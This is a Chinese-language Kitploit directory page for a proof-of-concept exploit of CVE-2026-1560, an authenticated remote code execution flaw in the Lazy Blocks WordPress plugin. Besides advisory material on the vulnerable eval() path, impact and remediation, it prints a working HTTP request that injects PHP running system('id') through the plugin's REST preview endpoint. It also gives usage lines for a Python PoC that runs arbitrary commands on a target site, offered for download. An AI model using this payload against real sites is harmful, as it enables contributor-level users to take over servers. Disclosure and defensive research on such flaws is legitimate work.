Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0 — CVE-2026-1560 的概念验证漏洞利用程序,该漏洞是 Lazy Blocks WordPress 插件中的一个已认证远程代码执行漏洞,允许低权限用户通过 REST API 执行任意 PHP 代码。 | Kitploit
工具/GitHubGitHub/z3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubz3yr0xx/cve-2026-1560-authenticated-remote-code-execution-in-lazy-blocks-4.2.0

CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0

CVE-2026-1560 的概念验证漏洞利用程序,该漏洞是 Lazy Blocks WordPress 插件中的一个已认证远程代码执行漏洞,允许低权限用户通过 REST API 执行任意 PHP 代码。

查看仓库
26个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-1560 – 自定义区块构建器(Custom Block Builder)– Lazy Blocks ≤ 4.2.0 中的认证远程代码执行漏洞

研究员: ZeYrOXxx

插件: 自定义区块构建器 – Lazy Blocks

受影响版本: ≤ 4.2.0

严重性: 高

CVSS: 8.8

漏洞类型: 认证远程代码执行(RCE)

攻击向量: REST API

所需权限: edit_posts(贡献者及以上)


参考

  • Wordfence 公告: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution

执行摘要

在自定义区块构建器 – Lazy Blocks WordPress 插件中发现了一个高危安全漏洞,影响版本直至并包括 4.2.0。
该漏洞允许具有低权限(贡献者角色)的认证用户通过用于区块预览功能的 REST API 端点在服务器上执行任意 PHP 代码。

此问题完全破坏了 WordPress 的权限模型,并可能导致服务器完全沦陷。


受影响端点

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/

任何具有 edit_posts 能力的认证用户均可访问该端点。


技术细节

权限检查

该 REST 路由注册时使用了弱权限回调:

root@kitploit:~
'permission_callback' => array( $this, 'block_builder_preview_permission' )

这包括了贡献者,而贡献者绝不应被允许执行 PHP 代码。


漏洞代码路径

REST 控制器 – classes/class-rest.php

root@kitploit:~
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);

区块渲染器 – classes/class-blocks.php

root@kitploit:~
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}

eval() 函数在未经清理或验证的情况下执行攻击者控制的 PHP 代码。


根本原因分析

Lazy Blocks 允许为区块自定义 PHP 渲染逻辑。
REST API 预览端点接受用户提供的区块定义,且不区分受信任的已存储区块与攻击者控制的预览区块。

通过注入扁平化的区块属性,例如:

  • code_output_method
  • code_editor_html

攻击者可以到达 php_eval() 执行汇聚点并运行任意 PHP 代码。


概念验证(HTTP)

请求:

root@kitploit:~
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Contributor_Credentials]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}

响应:

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}

✔ 已确认任意命令执行


此 PoC 严格用于安全测试和研究目的。


影响

具有贡献者访问权限的攻击者可以:

  • 执行任意系统命令
  • 读取敏感文件(例如 wp-config.php)
  • 修改 PHP 源文件
  • 将权限提升至管理员
  • 完全攻陷 WordPress 实例

修复建议

  • 将 PHP 渲染限制为仅限管理员
  • 移除对用户可控输入使用 eval()
  • 阻止通过 REST 预览包含 PHP 代码的区块
  • 要求 manage_options 或 unfiltered_html 能力
  • 用安全的模板机制替代 PHP 执行

使用方法(Python PoC)

要求

  • Python 3.x
  • requests 库
  • 具有 edit_posts 能力的有效 WordPress 凭据(贡献者及以上)

安装依赖

root@kitploit:~
pip install requests

运行漏洞利用

root@kitploit:~
python3 poc.py <target_url> <username> <password> "<command>"

示例

root@kitploit:~
python3 poc.py https://victim.site contributor password "id"

如果目标存在漏洞,命令输出将返回在 HTTP 响应中。

⚠️ 此概念验证严格用于授权的安全测试和研究目的。

下载工具